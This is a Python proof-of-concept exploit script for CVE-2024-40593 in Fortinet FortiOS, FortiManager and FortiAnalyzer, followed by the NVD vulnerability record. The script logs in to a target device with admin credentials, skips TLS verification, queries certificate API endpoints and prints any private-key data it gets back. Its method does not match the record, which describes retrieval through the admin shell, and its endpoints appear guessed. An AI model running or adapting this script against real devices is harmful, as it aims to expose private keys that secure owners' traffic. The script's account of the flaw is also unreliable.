CVE-2024-40593

# CVE-2024-40593 PoC - Certificate Private Key Retrieval # Note: This PoC is for educational purposes only import requests import argparse from requests.auth import HTTPBasicAuth def exploit_cve_2024_40593(target_url, username, password): """ Exploit for CVE-2024-40593: Key Management Error in Fortinet Products Allows authenticated admin to retrieve certificate's private key """ print(f"[*] Targeting: {target_url}") print(f"[*] Authenticating as: {username}") # Authentication session = requests.Session() auth = HTTPBasicAuth(username, password) # Attempt to retrieve certificate private key via admin shell # This requires CLI access through the web interface or API # Method 1: Via CLI command cli_cmd = "execute certificate local list" # Method 2: Direct API access to certificate endpoint cert_endpoint = f"{target_url}/api/v2/monitor/system/certificate/local" try: # Check if we can access certificate information response = session.get(cert_endpoint, auth=auth, verify=False, timeout=30) if response.status_code == 200: cert_data = response.json() print("[+] Successfully retrieved certificate information") # Attempt to retrieve private key private_key_cmd = f"{target_url}/api/v2/monitor/system/certificate/local/detail" pk_response = session.get(private_key_cmd, auth=auth, verify=False, timeout=30) if pk_response.status_code == 200: print("[+] VULNERABLE: Private key accessible!") print(f"[+] Private Key Data: {pk_response.text[:500]}") return True elif response.status_code == 401: print("[-] Authentication failed") else: print(f"[-] Unexpected response: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2024-40593 PoC") parser.add_argument("-t", "--target", required=True, help="Target URL") parser.add_argument("-u", "--username", required=True, help="Admin username") parser.add_argument("-p", "--password", required=True, help="Admin password") args = parser.parse_args() exploit_cve_2024_40593(args.target, args.username, args.password)

{"cve": {"id": "CVE-2024-40593", "sourceIdentifier": "[email protected]", "published": "2025-12-11T15:15:46.243", "lastModified": "2025-12-12T18:28:55.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A key management errors vulnerability in Fortinet FortiAnalyzer 7.4.0 through 7.4.2, FortiAnalyzer 7.2.0 through 7.2.5, FortiAnalyzer 7.0 all versions, FortiAnalyzer 6.4 all versions, FortiManager 7.4.0 through 7.4.2, FortiManager 7.2.0 through 7.2.5, FortiManager 7.0 all versions, FortiManager 6.4 all versions, FortiOS 7.6.0, FortiOS 7.4.4, FortiOS 7.2.7, FortiOS 7.0.14, FortiPortal 6.0 all versions may allow an authenticated admin to retrieve a certificate's private key via the device's admin shell."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-320"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.2.6", "matchCriteriaId": "F07BE2AB-5F28-4773-B9C3-1D76EA1C2D06"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.3", "matchCriteriaId": "AF309EFD-1770-44AF-B192-3D9816F792CB"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.2.6", "matchCriteriaId": "71CC4AA3-04CC-49CA-A012-E28C4D1F11DE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.3", "matchCriteriaId": "E4490512-36ED-4212-9D34-D74739A56E84"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:7.0.14:*:*:*:*:*:*:*", "matchCriteriaId": "71294A46-2667-4213-BA04-542291BC5D58"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:7.2.7:*:*:*:*:*:*:*", "matchCriteriaId": "AA6A7535-6EDF-4792-8AC4-ADFF40811E08"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:7.4.4:*:*:*:*:*:*:*", "matchCriteriaId": "3B543474-445F-431D-A06A-63F566798BCF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:7.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "44CE8EE3-D64A-49C8-87D7-C18B302F864A"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiportal:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndIncluding": "6.0.15", "matchCriteriaId": "A52BD29D-7295-48A1-9B89-86517C9AA5AE"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-24-133", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}